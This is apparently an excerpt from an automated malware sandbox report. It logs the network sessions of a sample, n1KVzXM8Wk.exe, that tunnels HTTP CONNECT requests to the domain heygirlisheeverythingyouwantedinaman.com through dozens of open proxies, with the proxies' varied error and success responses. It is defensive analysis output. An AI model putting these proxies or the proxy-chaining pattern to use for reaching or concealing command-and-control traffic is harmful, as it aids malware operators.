                                                                                                      1857192.168.2.454591132.148.128.8481816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.325078964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.740827084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1858192.168.2.455088104.17.210.9806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.327380896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.414792061 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1859192.168.2.45511445.144.30.1994436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.332006931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1860192.168.2.45459772.167.220.46150776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.367166996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1861192.168.2.455119211.234.125.34436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.387979031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1862192.168.2.45506027.65.30.3710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.397556067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1863192.168.2.455107104.25.81.82806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.450728893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.538171053 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1864192.168.2.455106159.203.61.16980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.497282028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.646531105 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1865192.168.2.454862103.49.114.19580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.498390913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1866192.168.2.455130218.145.131.1824436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.499973059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1867192.168.2.454608188.124.230.43176626812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.511379957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1868192.168.2.45511820.122.126.4079796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.517318964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.844680071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.147207975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1869192.168.2.455104186.97.167.2656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.517527103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1870192.168.2.455111104.244.75.78315346812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.523525953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1871192.168.2.45511082.65.98.3531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.523627043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.037714005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647200108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.741189957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.795542955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.846256971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.944179058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1872192.168.2.454954164.92.86.113575526812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.524029970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1873192.168.2.454905103.159.194.15177776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.529833078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1874192.168.2.455140172.67.105.234806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.539489985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.626597881 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1875192.168.2.455141104.16.230.163806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.567183971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.654165030 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1876192.168.2.45513938.156.233.769996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.613580942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.178405046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.684041023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.300410986 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1877192.168.2.45511561.111.38.5806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.627536058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.914412022 CET507INHTTP/1.1 502 Proxy Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:34 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 341
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1878192.168.2.454626202.148.22.10656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.627870083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1879192.168.2.454653192.111.129.145168946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.641419888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1880192.168.2.455125125.228.143.20741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.642956018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1881192.168.2.45512145.251.231.11356786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.693078995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1882192.168.2.455175172.67.182.128806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.705389977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.792815924 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1883192.168.2.455135154.12.178.107299856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.705590010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1884192.168.2.450551162.240.10.35470566812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.705790043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.769251108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.846256971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.849884987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:56.850116968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1885192.168.2.455173201.184.159.2856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.706185102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1886192.168.2.454981191.252.113.2731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.710974932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:00.995507002 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1887192.168.2.45517145.189.151.1780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.712724924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.900285006 CET202INHTTP/1.0 403 Forbidden
                                                                                                      Content-Length: 810
                                                                                                      Content-Type: text/html
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Expires: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Server: Mikrotik HttpProxy
                                                                                                      Proxy-Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1888192.168.2.455150213.233.178.13731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:32.717835903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.990842104 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                      Server: squid/4.10
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3705
                                                                                                      X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
